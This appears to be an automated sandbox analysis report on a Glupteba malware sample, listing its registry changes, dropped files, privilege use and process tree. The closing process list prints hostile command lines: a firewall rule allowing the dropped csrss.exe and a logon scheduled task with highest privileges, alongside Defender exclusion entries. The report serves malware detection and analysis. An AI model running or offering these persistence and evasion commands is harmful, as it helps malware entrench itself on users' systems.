Analysis Overview
SHA256
a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39
Threat Level: Known bad
The file a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39 was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Glupteba
Glupteba payload
Modifies boot configuration data using bcdedit
Drops file in Drivers directory
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Loads dropped DLL
UPX packed file
Executes dropped EXE
Windows security modification
Manipulates WinMonFS driver.
Adds Run key to start application
Checks installed software on the system
Manipulates WinMon driver.
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Checks for VirtualBox DLLs, possible anti-VM trick
Command and Scripting Interpreter: PowerShell
Modifies system certificate store
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
GoLang User-Agent
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 23:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 23:20
Reported
2024-05-09 23:25
Platform
win7-20240221-en
Max time kernel
292s
Max time network
299s
Command Line
Signatures
Glupteba
Glupteba payload
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe | N/A |
| N/A | N/A | C:\Windows\windefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe | N/A |
Loads dropped DLL
UPX packed file
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe = "0" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240509232011.cab | C:\Windows\system32\makecab.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240509232011.log C:\Windows\Logs\CBS\CbsPersist_20240509232011.cab
C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe
"C:\Users\Admin\AppData\Local\Temp\a26a57937cf5bb97d05e5636e7b7a01b0a899f71f4b084ff74cedfe55431ee39.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
